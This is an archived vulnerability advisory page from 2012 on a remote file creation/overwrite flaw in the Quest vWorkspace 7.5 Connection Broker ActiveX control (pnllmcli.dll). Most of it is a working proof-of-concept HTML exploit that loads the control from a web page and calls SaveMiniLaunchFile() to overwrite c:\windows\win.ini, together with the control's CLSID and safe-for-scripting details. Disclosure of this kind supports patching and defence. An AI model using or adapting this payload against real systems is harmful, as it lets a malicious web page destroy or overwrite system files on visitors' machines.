Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27874
HistoryApr 09, 2012 - 12:00 a.m.

Quest vWorkspace 7.5 Connection Broker Client ActiveX Control (pnllmcli.dll 7.5.304.547) SaveMiniLaunchFile() Method Remote File Creation / Overwrite

2012-04-0900:00:00
vulners.com
12

<!–
Quest vWorkspace 7.5 Connection Broker Client ActiveX Control (pnllmcli.dll 7.5.304.547)
SaveMiniLaunchFile() Method Remote File Creation / Overwrite

ie7/8

vendor site: http://www.quest.com/
file tested: Quest_vWorkspace-75–32-bit_75.zip

Binary Path: C:\WINDOWS\system32\pnllmcli.dll
CLSID: {D9397163-A2DB-4A4A-B2C9-34E876AF2DFC}
Progid: PNLLM.Client.1
Safe For Initialization (Registry): True
Safe For Scripting (Registry): True

rgod
–>
<!-- saved from url=(0014)about:internet –>
<html>
<script>
var obj = new ActiveXObject("PNLLM.Client.1");
obj.SaveMiniLaunchFile("","c:\\windows\\win.ini");
</script>

original url: http://retrogod.altervista.org/9sg_quest_vworkspace_poc.htm